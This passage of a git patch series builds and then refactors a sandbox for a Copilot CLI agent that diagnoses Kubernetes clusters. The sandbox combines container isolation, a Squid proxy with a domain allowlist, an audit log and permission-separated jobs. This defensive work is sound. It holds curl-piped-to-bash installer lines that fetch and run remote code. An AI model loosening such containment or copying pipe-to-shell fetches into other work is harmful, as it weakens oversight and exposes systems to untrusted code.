/var/lib/apt/lists/* + +# Install kubelogin +RUN curl -fsSL https://github.com/Azure/kubelogin/releases/latest/download/kubelogin-linux-amd64.zip -o /tmp/kubelogin.zip \ + && apt-get update && apt-get install -y unzip && rm -rf /var/lib/apt/lists/* \ + && unzip /tmp/kubelogin.zip -d /tmp/kubelogin \ + && mv /tmp/kubelogin/bin/linux_amd64/kubelogin /usr/local/bin/ \ + && rm -rf /tmp/kubelogin /tmp/kubelogin.zip + +# 
Install Copilot CLI +RUN curl -fsSL https://gh.io/copilot-install | bash + +# Non-root user +RUN useradd -m -s /bin/bash agent +USER agent +WORKDIR /workspace + +ENTRYPOINT ["/bin/bash"] diff --git a/.github/containers/proxy/squid.conf b/.github/containers/proxy/squid.conf new file mode 100644 index 0000000..1579a9d --- /dev/null +++ b/.github/containers/proxy/squid.conf @@ -0,0 +1,43 @@ +# ────────────────────────────────────────────────────────── +# Squid proxy for agent network isolation +# +# Only domains in this allowlist are reachable from the agent +# container. Everything else is denied. +# ────────────────────────────────────────────────────────── + +# ACL: allowed domains for the cluster-doctor agent +acl allowed_domains dstdomain api.githubcopilot.com +acl allowed_domains dstdomain api.github.com +acl allowed_domains dstdomain .azmk8s.io +acl allowed_domains dstdomain login.microsoftonline.com +acl allowed_domains dstdomain management.azure.com + +# Read additional allowed domains from file (injected at runtime) +acl dynamic_domains dstdomain "/etc/squid/dynamic-domains.txt" + +# SSL bump: allow CONNECT method for HTTPS +acl SSL_ports port 443 +acl Safe_ports port 80 +acl Safe_ports port 443 +acl CONNECT method CONNECT + +# Deny non-safe ports +http_access deny !Safe_ports +http_access deny CONNECT !SSL_ports + +# Allow traffic to allowlisted domains only +http_access allow allowed_domains +http_access allow dynamic_domains + +# Deny everything else +http_access deny all + +# Proxy listens on 3128 +http_port 3128 + +# Logging (useful for debugging, can be disabled in production) +access_log stdio:/var/log/squid/access.log +cache_log stdio:/var/log/squid/cache.log + +# No caching needed +cache deny all diff --git a/.github/scripts/run-sandboxed-agent.sh b/.github/scripts/run-sandboxed-agent.sh new file mode 100755 index 0000000..6084a10 --- /dev/null +++ b/.github/scripts/run-sandboxed-agent.sh @@ -0,0 +1,136 @@ +#!/usr/bin/env bash +set -euo pipefail + 
+# ────────────────────────────────────────────────────────── +# Run the Copilot CLI agent inside a network-isolated container. +# +# The agent container sits on an internal Docker network with +# no direct internet access. All HTTP/HTTPS traffic is routed +# through a Squid proxy that enforces a domain allowlist. +# +# Usage: +# .github/scripts/run-sandboxed-agent.sh \ +# --kubeconfig "$HOME/.kube/config" \ +# --cluster-api-server "mycluster-dns-abc123.hcp.eastus.azmk8s.io" \ +# --prompt-file /tmp/prompt.md \ +# --output-file agent-output.json \ +# --mcp-config .copilot/mcp-config.json \ +# --copilot-token "$COPILOT_CLI_TOKEN" \ +# --github-mcp-token "$GITHUB_TOKEN" +# ────────────────────────────────────────────────────────── + +# Parse arguments +while [[ $# -gt 0 ]]; do + case $1 in + --kubeconfig) KUBECONFIG_PATH="$2"; shift 2 ;; + --cluster-api-server) CLUSTER_API="$2"; shift 2 ;; + --prompt-file) PROMPT_FILE="$2"; shift 2 ;; + --output-file) OUTPUT_FILE="$2"; shift 2 ;; + --mcp-config) MCP_CONFIG="$2"; shift 2 ;; + --copilot-token) COPILOT_TOKEN="$2"; shift 2 ;; + --github-mcp-token) GITHUB_MCP_TOKEN="$2"; shift 2 ;; + *) echo "Unknown option: $1"; exit 1 ;; + esac +done + +NETWORK_NAME="agent-net-$$" +PROXY_CONTAINER="squid-proxy-$$" +AGENT_CONTAINER="agent-$$" +SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" +REPO_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)" + +cleanup() { + echo "Cleaning up containers and network..." + docker rm -f "$PROXY_CONTAINER" 2>/dev/null || true + docker rm -f "$AGENT_CONTAINER" 2>/dev/null || true + docker network rm "$NETWORK_NAME" 2>/dev/null || true +} +trap cleanup EXIT + +# ── Build agent image (cached after first run) ── +echo "Building agent container image..." 
+docker build -t cluster-doctor-agent:local \ + -f "$REPO_ROOT/.github/containers/agent/Dockerfile" \ + "$REPO_ROOT/.github/containers/agent/" \ + --quiet + +# ── Create isolated Docker network ── +# --internal: no external connectivity from this network +echo "Creating isolated network: $NETWORK_NAME" +docker network create --internal "$NETWORK_NAME" + +# ── Generate dynamic domain allowlist ── +# Add the specific cluster API server FQDN +DYNAMIC_DOMAINS=$(mktemp) +echo "$CLUSTER_API" > "$DYNAMIC_DOMAINS" +echo "Dynamic allowlist: $CLUSTER_API" + +# ── Start Squid proxy ── +# Proxy is on both the isolated network (for agent) and bridge (for internet) +echo "Starting Squid proxy..." +docker run -d \ + --name "$PROXY_CONTAINER" \ + --network "$NETWORK_NAME" \ + -v "$REPO_ROOT/.github/containers/proxy/squid.conf:/etc/squid/squid.conf:ro" \ + -v "$DYNAMIC_DOMAINS:/etc/squid/dynamic-domains.txt:ro" \ + ubuntu/squid:latest + +# Connect proxy to default bridge for internet access +docker network connect bridge "$PROXY_CONTAINER" + +# Wait for Squid to start +sleep 3 +echo "Proxy ready" + +# ── Run agent in isolated container ── +echo "Starting agent container (network-isolated, proxy-gated)..." 
+docker run --rm \ + --name "$AGENT_CONTAINER" \ + --network "$NETWORK_NAME" \ + -e "HTTP_PROXY=http://$PROXY_CONTAINER:3128" \ + -e "HTTPS_PROXY=http://$PROXY_CONTAINER:3128" \ + -e "NO_PROXY=localhost,127.0.0.1" \ + -e "GITHUB_TOKEN=$COPILOT_TOKEN" \ + -e "GITHUB_MCP_TOKEN=$GITHUB_MCP_TOKEN" \ + -e "KUBECONFIG=/home/agent/.kube/config" \ + -v "$KUBECONFIG_PATH:/home/agent/.kube/config:ro" \ + -v "$REPO_ROOT:/workspace:ro" \ + -v "$(dirname "$OUTPUT_FILE"):/output:rw" \ + -v "$PROMPT_FILE:/tmp/prompt.md:ro" \ + -w /workspace \ + cluster-doctor-agent:local \ + -c ' + # Start port-forward to AKS MCP server (goes through proxy to K8s API) + kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & + sleep 3 + + # Run the agent + copilot -p "$(cat /tmp/prompt.md)" \ + --agent "cluster-doctor" \ + --additional-mcp-config @"'"$MCP_CONFIG"'" \ + --allow-all-tools + + # Copy output to mounted volume + if [ -f agent-output.json ]; then + cp agent-output.json /output/'"$(basename "$OUTPUT_FILE")"' + fi + ' + +echo "Agent container exited" + +# Verify output +if [ -f "$OUTPUT_FILE" ]; then + echo "Agent output produced: $OUTPUT_FILE" + python3 -c "import json; json.load(open('$OUTPUT_FILE'))" || { + echo "ERROR: agent-output.json is not valid JSON" + exit 1 + } +else + echo "ERROR: Agent did not produce output" + exit 1 +fi + +# Print proxy access log for auditability +echo "" +echo "=== Proxy access log (all agent network activity) ===" +docker logs "$PROXY_CONTAINER" 2>&1 | grep -v "cache.log" || true diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index af91ba3..c94c4c1 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -1,11 +1,16 @@ name: "Cluster Doctor (Safe Outputs)" -# Three-phase pattern: -# 1. 
Diagnose - Agent explores cluster freely (read-only K8s + GitHub MCP) +# Three-phase pattern with network-isolated agent: +# 1. Diagnose - Agent in container, all traffic through allowlisted proxy # 2. Scan - Validate constraints, sanitize secrets, AI threat detection # 3. Apply - Deterministic write to GitHub (issues, PRs) # -# Each job has exactly one concern and the minimum permissions for it. +# Defense-in-depth layers: +# - Container isolation (agent runs in Docker, not on bare runner) +# - Network firewall (Squid proxy with domain allowlist) +# - Scoped credentials (read-only K8s RBAC, read-only Azure) +# - Safe outputs (constraint validation, secret sanitization, threat detection) +# - Permission separation (three jobs, three permission sets) # # See: https://github.com/microsoftgbb/safe-outputs-action @@ -23,12 +28,21 @@ jobs: # ────────────────────────────────────────────────────────── # Job 1: Diagnose # - # Has: Azure OIDC (read-only), K8s MCP (read-only), GitHub MCP (read-only) - # Does NOT have: GitHub write token + # Setup runs on the bare runner (Azure login, kubeconfig). + # Agent runs inside an isolated Docker container where all + # network traffic is routed through a Squid proxy enforcing + # a domain allowlist. The proxy log provides a full audit + # trail of every domain the agent contacted. # - # The agent can freely explore the cluster - check pod logs, - # inspect HPA config, trace dependency chains, etc. - # Produces a structured safe-outputs JSON artifact. + # Allowed domains: + # - api.githubcopilot.com (model API) + # - api.github.com (GitHub MCP, read-only) + # - *.azmk8s.io (K8s API server, for port-forward) + # - login.microsoftonline.com (Azure AD token exchange) + # - management.azure.com (Azure ARM, read-only) + # - (injected dynamically) + # + # Everything else is blocked at the network level. 
# ────────────────────────────────────────────────────────── diagnose: if: | @@ -39,7 +53,7 @@ jobs: environment: copilot runs-on: ubuntu-latest permissions: - id-token: write # Azure OIDC (scoped to read-only role) + id-token: write # Azure OIDC (scoped to read-only roles) contents: read issues: read outputs: @@ -63,6 +77,7 @@ jobs: run: | curl -fsSL https://gh.io/copilot-install | bash + # ── Parse cluster info (runs on host, needs Copilot CLI) ── - name: Parse cluster info from issue body id: cluster-info env: @@ -90,6 +105,7 @@ jobs: echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT + # ── Setup cluster access (runs on host) ── - name: Azure CLI Login uses: azure/login@v2 with: @@ -97,90 +113,94 @@ jobs: tenant-id: ${{ secrets.ARM_TENANT_ID }} subscription-id: ${{ secrets.ARM_SUBSCRIPTION_ID }} - - name: Connect to AKS cluster + - name: Get AKS credentials and API server FQDN + id: aks run: | az aks install-cli az aks get-credentials \ --resource-group ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} \ --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ --overwrite-existing - kubectl cluster-info - kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & - sleep 3 - - # ── Agent explores the cluster freely ── - # - # CAN: query K8s resources, read pod logs, check events, read issue context - # CANNOT: write to GitHub, mutate K8s, access K8s secrets, reach external networks - # - # Recommended K8s ClusterRole for the AKS MCP service account: - # pods, events, nodes, services, namespaces: get, list - # pods/log: get - # deployments, replicasets, daemonsets, statefulsets: get, list - # horizontalpodautoscalers: get, list - # NO secrets, NO configmaps (or namespace-scoped), NO write verbs - - - name: AI diagnosis + + # Extract the API server FQDN for the proxy allowlist + API_SERVER=$(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed 's|https://||' | cut -d: -f1) + echo 
"api_server=$API_SERVER" >> $GITHUB_OUTPUT + echo "Cluster API server: $API_SERVER" + + - name: Post work started comment env: - GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ + --body "🤖 **Cluster Doctor is on the case!** + + Connected to cluster. AI diagnosis starting in a sandboxed environment + with network-restricted access. + + 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" + + # ── Generate agent prompt ── + - name: Generate diagnosis prompt run: | ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" CLUSTER_NAME="${{ steps.cluster-info.outputs.CLUSTER_NAME }}" RG="${{ steps.cluster-info.outputs.RESOURCE_GROUP }}" - export PROMPT="You are the Cluster Doctor diagnosing AKS cluster '${CLUSTER_NAME}' in resource group '${RG}'. + cat > /tmp/diagnosis-prompt.md << PROMPT + You are the Cluster Doctor diagnosing AKS cluster "${CLUSTER_NAME}" in resource group "${RG}". - Use the AKS MCP server to explore the cluster. You have read-only access to all Kubernetes resources. + Use the AKS MCP server to explore the cluster. You have read-only access to Kubernetes resources. Use the GitHub MCP server to read issue #${ISSUE_NUMBER} in ${{ github.repository }} for context. 
INVESTIGATE FREELY: - Start broad (cluster health, node status, pod states) - - Follow threads when you find issues (e.g., OOMKilled -> check resource limits -> check HPA -> check node capacity) + - Follow threads when you find issues (OOMKilled -> resource limits -> HPA -> node capacity) - Check pod logs for crash details - - Trace the dependency chain (service -> deployment -> pods -> events) + - Trace dependency chains (service -> deployment -> pods -> events) - Look at recent events for warning patterns - When your investigation is complete, produce your findings as a JSON file at agent-output.json following this schema: + Produce your findings as a JSON file at agent-output.json: { - \"version\": \"1\", - \"actions\": [ + "version": "1", + "actions": [ { - \"type\": \"issue_comment\", - \"issue_number\": ${ISSUE_NUMBER}, - \"body\": \"## Cluster Doctor Report\n\n\" + "type": "issue_comment", + "issue_number": ${ISSUE_NUMBER}, + "body": "## Cluster Doctor Report\n\n" } ] } - If you identify config/code changes that would fix the issue, add a create_pull_request action: + For config/code fixes, add a create_pull_request action: { - \"type\": \"create_pull_request\", - \"title\": \"[cluster-doctor] \", - \"body\": \"\", - \"head\": \"cluster-doctor/fix-\", - \"files\": { \"path/to/file\": \"full file content\" } + "type": "create_pull_request", + "title": "[cluster-doctor] ", + "body": "", + "head": "cluster-doctor/fix-", + "files": { "path/to/file": "content" } } RULES: - - Write ONLY the agent-output.json file - - Do NOT include secrets, tokens, connection strings, or internal IPs in your output - - Use [cluster-doctor] prefix on all titles" + - Write ONLY agent-output.json + - Do NOT include secrets, tokens, connection strings, or internal IPs + - Use [cluster-doctor] prefix on all titles + PROMPT - copilot -p "$PROMPT" \ - --agent "cluster-doctor" \ - --additional-mcp-config @'.copilot/mcp-config.json' \ - --allow-all-tools - - if [ ! 
-f agent-output.json ]; then - echo "ERROR: Agent did not produce agent-output.json" - exit 1 - fi - python3 -c "import json; json.load(open('agent-output.json'))" || { - echo "ERROR: agent-output.json is not valid JSON" - exit 1 - } + # ── Run agent in sandboxed container ── + - name: Run sandboxed agent + env: + COPILOT_CLI_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + .github/scripts/run-sandboxed-agent.sh \ + --kubeconfig "$HOME/.kube/config" \ + --cluster-api-server "${{ steps.aks.outputs.api_server }}" \ + --prompt-file /tmp/diagnosis-prompt.md \ + --output-file "$GITHUB_WORKSPACE/agent-output.json" \ + --mcp-config ".copilot/mcp-config.json" \ + --copilot-token "$COPILOT_CLI_TOKEN" \ + --github-mcp-token "$GITHUB_MCP_TOKEN" - uses: actions/upload-artifact@v4 with: @@ -191,11 +211,9 @@ jobs: # ────────────────────────────────────────────────────────── # Job 2: Scan # - # Has: nothing - no cloud creds, no write tokens, no cluster access - # Just the agent's output artifact and the safe-outputs validator. - # - # Validates constraints, sanitizes secrets, runs AI threat detection. - # If anything fails, the workflow stops here - nothing gets written. + # No credentials. No cluster access. No write tokens. + # Pure validation: constraints, secret sanitization, AI threat scan. + # Acts as a circuit breaker between diagnosis and action. # ────────────────────────────────────────────────────────── scan: needs: diagnose @@ -230,7 +248,6 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} - # Re-upload the (potentially sanitized) output for the apply job - uses: actions/upload-artifact@v4 with: name: scanned-output @@ -241,11 +258,8 @@ jobs: # ────────────────────────────────────────────────────────── # Job 3: Apply # - # Has: GitHub write token (issues, contents, pull-requests) - # Does NOT have: AI agent, cloud creds, cluster access - # - # Mechanically applies the validated, sanitized output. 
- # No decisions made here - just execution. + # GitHub write token only. No agent. No cluster creds. + # Mechanically applies validated, sanitized output. # ────────────────────────────────────────────────────────── apply: needs: [diagnose, scan] From 205991c3f764a118a7c6327ea7b1a302abc173bf Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 20:57:31 -0400 Subject: [PATCH 5/7] refactor: domain allowlist defined in workflow YAML Moved the domain allowlist from hardcoded squid.conf to a top-level env var (AGENT_ALLOWED_DOMAINS) in the workflow YAML. The cluster API server FQDN is appended at runtime. The allowlist is now visible and editable directly in the workflow file without touching proxy configuration. squid.conf is reduced to a generic template that reads from /etc/squid/allowed-domains.txt which is generated from the YAML values at container start. Flow: YAML env -> shell variable -> temp file -> mounted into Squid Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/containers/proxy/squid.conf | 30 ++++++---------- .github/scripts/run-sandboxed-agent.sh | 34 ++++++++----------- ...ot.trigger-cluster-doctor.safe-outputs.yml | 22 +++++++++++- 3 files changed, 47 insertions(+), 39 deletions(-) diff --git a/.github/containers/proxy/squid.conf b/.github/containers/proxy/squid.conf index 1579a9d..bc6c5d9 100644 --- a/.github/containers/proxy/squid.conf +++ b/.github/containers/proxy/squid.conf @@ -1,43 +1,35 @@ # ────────────────────────────────────────────────────────── # Squid proxy for agent network isolation # -# Only domains in this allowlist are reachable from the agent -# container. Everything else is denied. +# Domain allowlist is injected at runtime via: +# /etc/squid/allowed-domains.txt +# +# This file is generated from the workflow YAML by the +# run-sandboxed-agent.sh script. All domain policy lives +# in the workflow, not here. 
# ────────────────────────────────────────────────────────── -# ACL: allowed domains for the cluster-doctor agent -acl allowed_domains dstdomain api.githubcopilot.com -acl allowed_domains dstdomain api.github.com -acl allowed_domains dstdomain .azmk8s.io -acl allowed_domains dstdomain login.microsoftonline.com -acl allowed_domains dstdomain management.azure.com - -# Read additional allowed domains from file (injected at runtime) -acl dynamic_domains dstdomain "/etc/squid/dynamic-domains.txt" +# Domain allowlist (injected at container start) +acl allowed_domains dstdomain "/etc/squid/allowed-domains.txt" -# SSL bump: allow CONNECT method for HTTPS +# Port safety acl SSL_ports port 443 acl Safe_ports port 80 acl Safe_ports port 443 acl CONNECT method CONNECT -# Deny non-safe ports http_access deny !Safe_ports http_access deny CONNECT !SSL_ports -# Allow traffic to allowlisted domains only +# Allow only allowlisted domains http_access allow allowed_domains -http_access allow dynamic_domains # Deny everything else http_access deny all -# Proxy listens on 3128 http_port 3128 -# Logging (useful for debugging, can be disabled in production) +# Audit log - every request the agent makes is recorded access_log stdio:/var/log/squid/access.log cache_log stdio:/var/log/squid/cache.log - -# No caching needed cache deny all diff --git a/.github/scripts/run-sandboxed-agent.sh b/.github/scripts/run-sandboxed-agent.sh index 6084a10..e9017ca 100755 --- a/.github/scripts/run-sandboxed-agent.sh +++ b/.github/scripts/run-sandboxed-agent.sh @@ -4,14 +4,14 @@ set -euo pipefail # ────────────────────────────────────────────────────────── # Run the Copilot CLI agent inside a network-isolated container. # -# The agent container sits on an internal Docker network with -# no direct internet access. All HTTP/HTTPS traffic is routed -# through a Squid proxy that enforces a domain allowlist. +# All HTTP/HTTPS traffic is routed through a Squid proxy that +# enforces a domain allowlist. 
The allowlist is passed as a +# newline-delimited string via --allowed-domains. # # Usage: # .github/scripts/run-sandboxed-agent.sh \ # --kubeconfig "$HOME/.kube/config" \ -# --cluster-api-server "mycluster-dns-abc123.hcp.eastus.azmk8s.io" \ +# --allowed-domains "$ALLOWED_DOMAINS" \ # --prompt-file /tmp/prompt.md \ # --output-file agent-output.json \ # --mcp-config .copilot/mcp-config.json \ @@ -23,7 +23,7 @@ set -euo pipefail while [[ $# -gt 0 ]]; do case $1 in --kubeconfig) KUBECONFIG_PATH="$2"; shift 2 ;; - --cluster-api-server) CLUSTER_API="$2"; shift 2 ;; + --allowed-domains) ALLOWED_DOMAINS="$2"; shift 2 ;; --prompt-file) PROMPT_FILE="$2"; shift 2 ;; --output-file) OUTPUT_FILE="$2"; shift 2 ;; --mcp-config) MCP_CONFIG="$2"; shift 2 ;; @@ -55,30 +55,29 @@ docker build -t cluster-doctor-agent:local \ --quiet # ── Create isolated Docker network ── -# --internal: no external connectivity from this network echo "Creating isolated network: $NETWORK_NAME" docker network create --internal "$NETWORK_NAME" -# ── Generate dynamic domain allowlist ── -# Add the specific cluster API server FQDN -DYNAMIC_DOMAINS=$(mktemp) -echo "$CLUSTER_API" > "$DYNAMIC_DOMAINS" -echo "Dynamic allowlist: $CLUSTER_API" +# ── Write domain allowlist to temp file ── +DOMAINS_FILE=$(mktemp) +echo "$ALLOWED_DOMAINS" | tr ',' '\n' | sed 's/^[[:space:]]*//;s/[[:space:]]*$//' | grep -v '^$' > "$DOMAINS_FILE" + +echo "Domain allowlist:" +cat "$DOMAINS_FILE" | sed 's/^/ /' +echo "" # ── Start Squid proxy ── -# Proxy is on both the isolated network (for agent) and bridge (for internet) echo "Starting Squid proxy..." 
docker run -d \ --name "$PROXY_CONTAINER" \ --network "$NETWORK_NAME" \ -v "$REPO_ROOT/.github/containers/proxy/squid.conf:/etc/squid/squid.conf:ro" \ - -v "$DYNAMIC_DOMAINS:/etc/squid/dynamic-domains.txt:ro" \ + -v "$DOMAINS_FILE:/etc/squid/allowed-domains.txt:ro" \ ubuntu/squid:latest -# Connect proxy to default bridge for internet access +# Proxy needs bridge access to reach the internet on behalf of the agent docker network connect bridge "$PROXY_CONTAINER" -# Wait for Squid to start sleep 3 echo "Proxy ready" @@ -100,17 +99,14 @@ docker run --rm \ -w /workspace \ cluster-doctor-agent:local \ -c ' - # Start port-forward to AKS MCP server (goes through proxy to K8s API) kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & sleep 3 - # Run the agent copilot -p "$(cat /tmp/prompt.md)" \ --agent "cluster-doctor" \ --additional-mcp-config @"'"$MCP_CONFIG"'" \ --allow-all-tools - # Copy output to mounted volume if [ -f agent-output.json ]; then cp agent-output.json /output/'"$(basename "$OUTPUT_FILE")"' fi @@ -130,7 +126,7 @@ else exit 1 fi -# Print proxy access log for auditability +# Full audit trail echo "" echo "=== Proxy access log (all agent network activity) ===" docker logs "$PROXY_CONTAINER" 2>&1 | grep -v "cache.log" || true diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index c94c4c1..48c24a2 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -24,6 +24,22 @@ on: permissions: contents: read +# ────────────────────────────────────────────────────────── +# Network firewall: domain allowlist for the agent container. +# The agent can ONLY reach these domains. Everything else is +# blocked by the Squid proxy at the network level. +# +# Edit this list to add/remove allowed destinations. +# The cluster API server FQDN is added dynamically at runtime. 
+# ────────────────────────────────────────────────────────── +env: + AGENT_ALLOWED_DOMAINS: | + api.githubcopilot.com + api.github.com + .azmk8s.io + login.microsoftonline.com + management.azure.com + jobs: # ────────────────────────────────────────────────────────── # Job 1: Diagnose @@ -193,9 +209,13 @@ jobs: COPILOT_CLI_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | + # Append the cluster-specific API server FQDN to the allowlist + DOMAINS="${AGENT_ALLOWED_DOMAINS} + ${{ steps.aks.outputs.api_server }}" + .github/scripts/run-sandboxed-agent.sh \ --kubeconfig "$HOME/.kube/config" \ - --cluster-api-server "${{ steps.aks.outputs.api_server }}" \ + --allowed-domains "$DOMAINS" \ --prompt-file /tmp/diagnosis-prompt.md \ --output-file "$GITHUB_WORKSPACE/agent-output.json" \ --mcp-config ".copilot/mcp-config.json" \ From 81e67454dc0e7373e2e76e52641ee7d35d4d8f34 Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 21:14:37 -0400 Subject: [PATCH 6/7] refactor: use agent-sandbox-action + safe-outputs-action Replaced inline Dockerfile, Squid config, and shell script with two composable actions: - microsoftgbb/agent-sandbox-action@v1 (container + network firewall) - microsoftgbb/safe-outputs-action@v1 (validate + sanitize + apply) Removed 311 lines of infrastructure code, replaced with 76 lines of declarative action configuration. Same five security layers, now reusable across any agentic workflow. 
Removed: - .github/containers/agent/Dockerfile - .github/containers/proxy/squid.conf - .github/scripts/run-sandboxed-agent.sh Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/containers/agent/Dockerfile | 36 ---- .github/containers/proxy/squid.conf | 35 ---- .github/scripts/run-sandboxed-agent.sh | 132 ------------- ...ot.trigger-cluster-doctor.safe-outputs.yml | 184 ++++++++---------- 4 files changed, 76 insertions(+), 311 deletions(-) delete mode 100644 .github/containers/agent/Dockerfile delete mode 100644 .github/containers/proxy/squid.conf delete mode 100755 .github/scripts/run-sandboxed-agent.sh diff --git a/.github/containers/agent/Dockerfile b/.github/containers/agent/Dockerfile deleted file mode 100644 index cc00b74..0000000 --- a/.github/containers/agent/Dockerfile +++ /dev/null @@ -1,36 +0,0 @@ -FROM ubuntu:24.04 - -# Avoid interactive prompts -ENV DEBIAN_FRONTEND=noninteractive - -RUN apt-get update && apt-get install -y --no-install-recommends \ - ca-certificates \ - curl \ - jq \ - python3 \ - apt-transport-https \ - gnupg \ - && rm -rf /var/lib/apt/lists/* - -# Install kubectl -RUN curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.31/deb/Release.key | gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg \ - && echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.31/deb/ /' > /etc/apt/sources.list.d/kubernetes.list \ - && apt-get update && apt-get install -y kubectl \ - && rm -rf /var/lib/apt/lists/* - -# Install kubelogin -RUN curl -fsSL https://github.com/Azure/kubelogin/releases/latest/download/kubelogin-linux-amd64.zip -o /tmp/kubelogin.zip \ - && apt-get update && apt-get install -y unzip && rm -rf /var/lib/apt/lists/* \ - && unzip /tmp/kubelogin.zip -d /tmp/kubelogin \ - && mv /tmp/kubelogin/bin/linux_amd64/kubelogin /usr/local/bin/ \ - && rm -rf /tmp/kubelogin /tmp/kubelogin.zip - -# Install Copilot CLI -RUN curl -fsSL https://gh.io/copilot-install | bash 
- -# Non-root user -RUN useradd -m -s /bin/bash agent -USER agent -WORKDIR /workspace - -ENTRYPOINT ["/bin/bash"] diff --git a/.github/containers/proxy/squid.conf b/.github/containers/proxy/squid.conf deleted file mode 100644 index bc6c5d9..0000000 --- a/.github/containers/proxy/squid.conf +++ /dev/null @@ -1,35 +0,0 @@ -# ────────────────────────────────────────────────────────── -# Squid proxy for agent network isolation -# -# Domain allowlist is injected at runtime via: -# /etc/squid/allowed-domains.txt -# -# This file is generated from the workflow YAML by the -# run-sandboxed-agent.sh script. All domain policy lives -# in the workflow, not here. -# ────────────────────────────────────────────────────────── - -# Domain allowlist (injected at container start) -acl allowed_domains dstdomain "/etc/squid/allowed-domains.txt" - -# Port safety -acl SSL_ports port 443 -acl Safe_ports port 80 -acl Safe_ports port 443 -acl CONNECT method CONNECT - -http_access deny !Safe_ports -http_access deny CONNECT !SSL_ports - -# Allow only allowlisted domains -http_access allow allowed_domains - -# Deny everything else -http_access deny all - -http_port 3128 - -# Audit log - every request the agent makes is recorded -access_log stdio:/var/log/squid/access.log -cache_log stdio:/var/log/squid/cache.log -cache deny all diff --git a/.github/scripts/run-sandboxed-agent.sh b/.github/scripts/run-sandboxed-agent.sh deleted file mode 100755 index e9017ca..0000000 --- a/.github/scripts/run-sandboxed-agent.sh +++ /dev/null @@ -1,132 +0,0 @@ -#!/usr/bin/env bash -set -euo pipefail - -# ────────────────────────────────────────────────────────── -# Run the Copilot CLI agent inside a network-isolated container. -# -# All HTTP/HTTPS traffic is routed through a Squid proxy that -# enforces a domain allowlist. The allowlist is passed as a -# newline-delimited string via --allowed-domains. 
-# -# Usage: -# .github/scripts/run-sandboxed-agent.sh \ -# --kubeconfig "$HOME/.kube/config" \ -# --allowed-domains "$ALLOWED_DOMAINS" \ -# --prompt-file /tmp/prompt.md \ -# --output-file agent-output.json \ -# --mcp-config .copilot/mcp-config.json \ -# --copilot-token "$COPILOT_CLI_TOKEN" \ -# --github-mcp-token "$GITHUB_TOKEN" -# ────────────────────────────────────────────────────────── - -# Parse arguments -while [[ $# -gt 0 ]]; do - case $1 in - --kubeconfig) KUBECONFIG_PATH="$2"; shift 2 ;; - --allowed-domains) ALLOWED_DOMAINS="$2"; shift 2 ;; - --prompt-file) PROMPT_FILE="$2"; shift 2 ;; - --output-file) OUTPUT_FILE="$2"; shift 2 ;; - --mcp-config) MCP_CONFIG="$2"; shift 2 ;; - --copilot-token) COPILOT_TOKEN="$2"; shift 2 ;; - --github-mcp-token) GITHUB_MCP_TOKEN="$2"; shift 2 ;; - *) echo "Unknown option: $1"; exit 1 ;; - esac -done - -NETWORK_NAME="agent-net-$$" -PROXY_CONTAINER="squid-proxy-$$" -AGENT_CONTAINER="agent-$$" -SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" -REPO_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)" - -cleanup() { - echo "Cleaning up containers and network..." - docker rm -f "$PROXY_CONTAINER" 2>/dev/null || true - docker rm -f "$AGENT_CONTAINER" 2>/dev/null || true - docker network rm "$NETWORK_NAME" 2>/dev/null || true -} -trap cleanup EXIT - -# ── Build agent image (cached after first run) ── -echo "Building agent container image..." -docker build -t cluster-doctor-agent:local \ - -f "$REPO_ROOT/.github/containers/agent/Dockerfile" \ - "$REPO_ROOT/.github/containers/agent/" \ - --quiet - -# ── Create isolated Docker network ── -echo "Creating isolated network: $NETWORK_NAME" -docker network create --internal "$NETWORK_NAME" - -# ── Write domain allowlist to temp file ── -DOMAINS_FILE=$(mktemp) -echo "$ALLOWED_DOMAINS" | tr ',' '\n' | sed 's/^[[:space:]]*//;s/[[:space:]]*$//' | grep -v '^$' > "$DOMAINS_FILE" - -echo "Domain allowlist:" -cat "$DOMAINS_FILE" | sed 's/^/ /' -echo "" - -# ── Start Squid proxy ── -echo "Starting Squid proxy..." 
